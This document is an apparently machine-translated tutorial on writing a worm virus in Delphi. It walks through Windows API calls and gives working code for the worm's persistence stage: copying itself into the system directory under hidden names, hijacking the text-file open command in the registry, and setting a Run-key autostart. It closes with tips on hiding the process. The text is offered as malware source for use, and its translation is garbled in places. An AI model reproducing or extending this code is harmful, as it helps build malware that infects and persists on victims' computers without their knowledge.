Analysis of using Delphi to compile worm virus

Objective:

Perhaps everyone thought of the virus, the first reaction is to use ASM to write, or vbsript, and high-level language such as Delphi is not like to write, in fact, the fact is not like this, as long as we spend some time, we can write short and efficient virus programs, Do not lose any of the programs written by sinks Oh.

A virus program should first be short, and our goal is to compress and control below 30k. Friends who have used Delphi know that if you join Forms,classes in uses ... This will make the target file very large, so in our program we need to use these libraries as much as possible. We only use Windows,winsock,shellapi,sysutils (this contains some commonly used functions, such as the operation of the file, the operation of the string, if the use of their own program to replace the target file will be even more small)

First, we know that a virus program is generally divided into the following three modules:

① protection module;

② infection module;

③ attack module.

Let's start with these three modules and implement their code separately.

a) Protection module.

In general, we copy ourselves to some of the system's directories, such as%systemroot%. So, first we have to get the path SDK for these specific directories to provide us with a function like this getsystemdirectory:

UINT GetSystemDirectory(
LPTSTR lpBuffer, // 存放返回的字符串的缓冲区
UINT uSize // 上面的缓冲去的长度
);

Related functions and getwindowsdirectory can get the%windows% path

After you get the system directory, the second step is to copy the file. The SDK provides us with a function CopyFile:

BOOL CopyFile(
LPCTSTR lpExistingFileName, // 源文件的路径
LPCTSTR lpNewFileName, // 目标文件的路径
BOOL bFailIfExists // 这是一个标志，如果目标文件已经存在，是否强制覆盖
);

After copying the file, we'll set the file to system and hide, so the file is not visible unless you choose to view all the files and display the protected files. Also, introduce a function setfileattributes:

BOOL SetFileAttributes(
LPCTSTR lpFileName, // 需要设置的文件的文件名
DWORD dwFileAttributes // 设置的值。
);

We're going to be set to hide and system here, then pass File_attribute_hidden+file_attribute_system for the second parameter

The following is the most important, let the file boot automatically run, we are generally write the registry, first with the RegOpenKey function to open a key.

LONG RegOpenKey(
HKEY hKey, // 主键，比如HKEY_LOCAL_MACHINE
LPCTSTR lpSubKey, // 跟随的subkey
PHKEY phkResult // 存放函数返回这个打开的键的句柄
);

After you get the HKEY, you can use the RegSetValueEx to write a specific value to the key.

LONG RegSetvalueEx(
HKEY hKey, // 这个就是刚才我们得到的句柄
LPCTSTR lpvalueName, // 键名的地址
DWORD Reserved, // 一般设置为0
DWORD dwType, // 我们写的键的类型，字符串为REG_SZ
CONST BYTE *lpData, // 键值的地址
DWORD cbData // 写入的键值的长度
);

Below, I combine the above instructions to give a short example:

procedure selfcopy;
var
Path,value:array [0..255] of char;
Hk:hkey;
S:string;
Begin
GetSystemDirectory (path,256);
Gets the path to the system
S:=strpas (path);
Convert to String
CopyFile (Pchar (paramstr (0)), Pchar (s+ '/ruin.exe '), false);
CopyFile (Pchar (paramstr (0)), Pchar (s+ '/virus_ruin.exe '), false);
//copy itself to the system directory for Ruin.exe,virus_ruin.exe
SetFileAttributes (Pchar (s+ '/ruin.exe '), File_attribute_hidden+file _attribute_system);
SetFileAttributes (Pchar (s+ '/virus_ruin.exe '), File_attribute_hidden+file_attribute_system);
//Set up just two files for system and hide
RegOpenKey (HKEY_CLASSES_ROOT, ' Txtfile/shell/open/command ', Hk);
value:= ' Virus_ruin.exe%1 ';
RegSetValueEx (Hk, ', 0,REG_SZ, @value, 17);
//associating Virus_ruin.exe with text files
RegOpenKey (HKEY_LOCAL_MACHINE, ' Software/microsoft/windows/currentversion/run ', HK);
value:= ' Ruin.exe ';
RegSetValueEx (Hk, ' ruin ', 0,REG_SZ, @value, 8);
//Set power-on autorun ruin.exe
End;

We look at the above program, we complete the self replication, and the power-on autorun, and associated with the text file, so that if the key under Run is deleted, then he opened the text file, the worm file is activated.

But in this case, you need to judge in your main program, and if you pass the argument equal to 1, open the text and protect yourself.

Such as:

begin
if paramcount=1 then
shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal);
//其他的代码

Here, I just give a simple example to describe a general idea, a lot of places are not perfect, such as the hidden process, you can judge, if it is 98 you can registerserverapplication if you are using 2000, you can do for service startup, Either insert a DLL, or use a cover letter method, boot load a DLL, or Win.ini.